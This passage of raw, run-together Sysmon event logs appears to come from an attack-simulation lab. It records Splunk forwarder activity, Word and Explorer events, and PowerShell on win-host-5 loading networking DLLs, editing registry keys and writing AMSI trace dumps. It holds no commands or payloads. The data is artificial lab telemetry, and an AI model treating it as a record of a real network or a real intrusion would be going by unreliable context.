  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061085Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.068{761B69BB-6125-6080-975C-00000000BA01}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061084Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:13.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061083Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061082Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.036{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50CF3ECB9A4EFAA590269D2CD3F5A6FD,SHA256=C0DE7A0B0CB854D7C7D798538DCA09FDE64CB3C904C9C8C3AE6C42B9F24B87F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061081Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.013{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A834C97D1231C540318AC78E27F0E2A,SHA256=9A08A8579A1BEBA435A74830AF7F0413CC2F551E287DA87D560DDDCD5D8976EC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530388Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:13.997{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530387Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:13.997{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978CDB950D595ED58D5666D6E58531B2,SHA256=B681A45638C7CBE7254FF062211E8644B223471D7A8F83C96716139693850A1Cfalsefalse - insufficient disk space 23542300x80000000000000001061098Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.252{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBD917129B62810D61DB79CE0EB240D9,SHA256=056F31D68A99AF6C42A9C1A7EB4469CA807047224E9C8EA1EF2F05345C6E1180,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061097Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:14.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061096Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061095Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.029{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DCB35D914D05A736836F55431F8DA6,SHA256=12472EAB58C817FE389F77966F6FB636480900B1CE628255EE9B0A4E98F15722,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061101Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:15.046{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061100Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:15.046{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061099Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:15.039{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203A9FD7C46C9C72B24CCD80A55C3F9B,SHA256=1CCACC08D52701AB313B4DE4C7BBB3D7BF83244718D971DEF3B1CA3A727146A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001530871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.968{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.968{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.967{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 534500x80000000000000001530868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.966{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exe 12241200x80000000000000001530867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498 13241300x80000000000000001530866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:15.949{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 10341000x80000000000000001530864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001530862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001530861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 11241100x80000000000000001530860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-04-19 12:25:39.286 23542300x80000000000000001530859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsefalse - insufficient disk space 11241100x80000000000000001530858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.949{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454640_powershell.exe_1572_4524_11.dmp2021-04-21 17:30:15.949 11241100x80000000000000001530857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.933{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454649_powershell.exe_1572_4524_10.dmp2021-04-21 17:30:15.933 11241100x80000000000000001530856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.933{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454657_powershell.exe_1572_4524_9.dmp2021-04-21 17:30:15.933 11241100x80000000000000001530855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.917{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454672_powershell.exe_1572_4524_8.dmp2021-04-21 17:30:15.917 11241100x80000000000000001530854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.917{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454673_powershell.exe_1572_4524_7.dmp2021-04-21 17:30:15.917 11241100x80000000000000001530853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.902{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454676_powershell.exe_1572_4524_6.dmp2021-04-21 17:30:15.902 11241100x80000000000000001530852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.902{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454684_powershell.exe_1572_4524_5.dmp2021-04-21 17:30:15.902 11241100x80000000000000001530851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.886{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454703_powershell.exe_1572_4524_4.dmp2021-04-21 17:30:15.886 
734700x80000000000000001530850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.871{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll14.8.3761.0 built by: NET48REL1Dia based SymReaderMicrosoft® .NET FrameworkMicrosoft Corporationdiasymreader.dllMD5=83673A2EC60EF42E8B88D3EE2763437C,SHA256=1F4A8B06F0DCB87F684EFE81FAB704C739C79B188A2C373D6B7ACB148AB4CFF6trueMicrosoft CorporationValid 12241200x80000000000000001530849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.871{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 734700x80000000000000001530848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.871{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=2562B81E255EB6DF8497402ABC6C59BB,SHA256=340532C238CA5B84BA9D7A2DB4D1CCD58D869FECC44A463A93F54C974E1B41F4trueMicrosoft WindowsValid 734700x80000000000000001530847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.866{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x80000000000000001530846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x80000000000000001530842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530841Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.865{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530840Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.864{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530839Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OnDemandConnRouteHelper.dll10.0.14393.4169 (rs1_release.210107-1130)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=BAE78E97BEBB832376654560305922E3,SHA256=6A188DC4F1005E46CCA529E9C757D9B3B5F98E5587AFAA5E4200C7DD2AC73355trueMicrosoft WindowsValid 734700x80000000000000001530838Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\winhttp.dll10.0.14393.4169 (rs1_release.210107-1130)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=24995B62FFC2519B34A2145673BD275F,SHA256=BB7D4DE1BE6111462F65F999A8969DA04113F15A80D534A93D3CCC76A9FE1F22trueMicrosoft WindowsValid 734700x80000000000000001530837Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 12241200x80000000000000001530836Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Tracing 734700x80000000000000001530835Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rtutils.dll10.0.14393.3930 (rs1_release.200901-1914)Routing UtilitiesMicrosoft® Windows® Operating SystemMicrosoft CorporationRTUTILS.DLLMD5=7F8BC94C915BD52D3422C5AD11389CEF,SHA256=68012DC490FEB77A313007FB1C3EC3F158A5C339AE620DC869B192EDAAED545BtrueMicrosoft WindowsValid 734700x80000000000000001530834Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasman.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access Connection ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationRasman.dllMD5=B07D32F44DFADC6EB9BBAFA1783B8468,SHA256=C412A22F84E06BA8B13BC53BBA263F066C0152261198FA74D6C3D7D18BB470E9trueMicrosoft WindowsValid 734700x80000000000000001530833Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasapi32.dll10.0.14393.4283 (rs1_release.210303-1802)Remote Access APIMicrosoft® Windows® Operating SystemMicrosoft Corporationrasapi32.dllMD5=4AD563CA721F138B52B98887B7A6F484,SHA256=054C99FD96437F0C40F8B9A6342DC80006D3509D024A9591BEBA0DD314C9FCB5trueMicrosoft WindowsValid 12241200x80000000000000001530832Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.848{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 
17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530719Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530718Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530717Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 